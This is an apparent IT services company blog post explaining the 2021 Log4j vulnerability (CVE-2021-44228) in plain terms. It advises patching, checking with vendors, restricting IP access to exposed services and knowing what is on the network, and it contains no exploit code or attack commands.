Blog / The Log4j Attack and You
Log4j is a library of computer code assets that can be used as part of open-source (free-to-use) Apache web server. It’s not crucial to the operation of a website. Instead, it generates log entries about the website’s activity. The problem is that since Log4j is part of a webserver, sufficiently skilled users can impact how those logs get put together. Done right, they can get any website using a vulnerable version of that library to do pretty much anything. For those interested in the technicalities, the remote code execution (RCE) vulnerability is CVE-2021-44228.
And it’s being actively exploited, just in time for the holidays (of course).
The first thing you should be wondering is if you’re affected by this vulnerability? Well, maybe. Just because you might not be running an Apache server in order to host some services doesn’t mean no one is, and that’s part of the problem with attacks like this. There are many software tools and devices that have web interfaces. Those online tools could be running Apache using a vulnerable version of the Log4j library, leaving you vulnerable as well..
If that’s the case, there’s nothing that you can do other than wait for and apply a vendor patch. This is fairly straightforward because you’re monitoring all your software, hardware and device vendors for critical patches and updates anyway, right? That’s pretty much standard advice from everywhere, and has been for a long time. Not actively monitoring for critical updates is the easiest way to get failing grades for cyber security.
So how can you tell if your vulnerable?
First, check with your vendors but remember that not all vendors are created equal so they may or may not be able to answer your question. Still it’s at least a bit more straightforward than your second option. Huntress has made test code to test web applications. Using it properly requires a bit of skill and the ability to follow instructions to the letter, but it’s the only method to really test for this vulnerability.
Is there anything else you can do?
Actually yes! Restrict IPs that connect to the GUI of your devices and services. It can be difficult for websites, but the idea is still pretty simple.
Get a list of all the services you have available on the internet (email, OWA, VPNs, etc.)
For each service, ask if the entire planet needs to be able to reach it.
Most of the time the answer to the second question is “no”, in which case you can set restrictions on who can access each service. Geographic IP filtering easily limits access so that only IPs from certain countries can connect. This won’t stop attackers from within whitelisted countries, but it’s better than nothing.
At the end of the day the most important thing is to make sure you actually know what’s in your network. That includes hardware, software, and any other online tools you use. Pretty much anything on your network can be used to get inside, from printers to smart phones and even IoT lightbulbs. Restricting access whenever and wherever you can and keeping everything on your network up to date sounds like basic advice, but it’s also effective.
As the holidays approach, I’ll dip into Julius Caesar for this week’s bit of Shakespearean wisdom: “I am fresh of spirit and resolved to meet all perils very constantly.”
If you require assistance with improving your cyber security profile or testing your network for Log4j vulnerabilities, contact your TRINUS account manager today.
By Kind, Courtesy of Your Friendly Neighbourhood Cyber-Man.
trinustech.com